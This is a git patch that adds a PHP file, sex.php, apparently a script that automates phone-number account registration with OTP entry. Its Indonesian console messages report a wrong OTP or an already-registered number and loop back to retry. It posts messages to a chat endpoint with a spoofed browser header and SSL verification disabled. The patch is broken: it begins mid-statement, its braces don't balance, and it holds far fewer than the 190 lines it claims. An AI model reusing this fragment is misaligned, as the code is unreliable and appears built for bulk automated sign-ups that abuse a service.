From 5f012d90c95db4b17f605ad96e372ad7662d8de9 Mon Sep 17 00:00:00 2001 From: elfie23 <61137300+elfie23@users.noreply.github.com> Date: Sat, 29 Feb 2020 16:49:11 +0700 Subject: [PATCH] Create sex.php --- sex.php | 190 ++++++++++++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 190 insertions(+) create mode 100644 sex.php diff --git a/sex.php b/sex.php new file mode 100644 index 0000000..f37a81e --- /dev/null +++ b/sex.php @@ -0,0 +1,190 @@ + $chatid, + 'text' => $pesan + ]; + $header = [ + "X-Requested-With: XMLHttpRequest", + "User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.84 Safari/537.36" + ]; + $ch = curl_init(); + curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); + curl_setopt($ch, CURLOPT_URL, $url); + curl_setopt($ch, CURLOPT_HTTPHEADER, $header); + curl_setopt($ch, CURLOPT_POSTFIELDS, $post ); + curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); + $datas = curl_exec($ch); + $error = curl_error($ch); + $status = curl_getinfo($ch, CURLINFO_HTTP_CODE); + curl_close($ch); + $debug['text'] = $pesan; + $debug['respon'] = json_decode($datas, true); + + + } + } + } + }else{ + echo color("red","-] Otp yang anda input salah"); + echo"\n==================================\n\n"; + echo color("yellow","!] Silahkan input kembali\n"); + goto otp; + } + }else{ + echo color("red","-] Nomor sudah teregistrasi"); + echo"\n==================================\n\n"; + echo color("yellow","!] Silahkan registrasi kembali\n"); + goto ulang; + } +// } + +// echo change()."\n";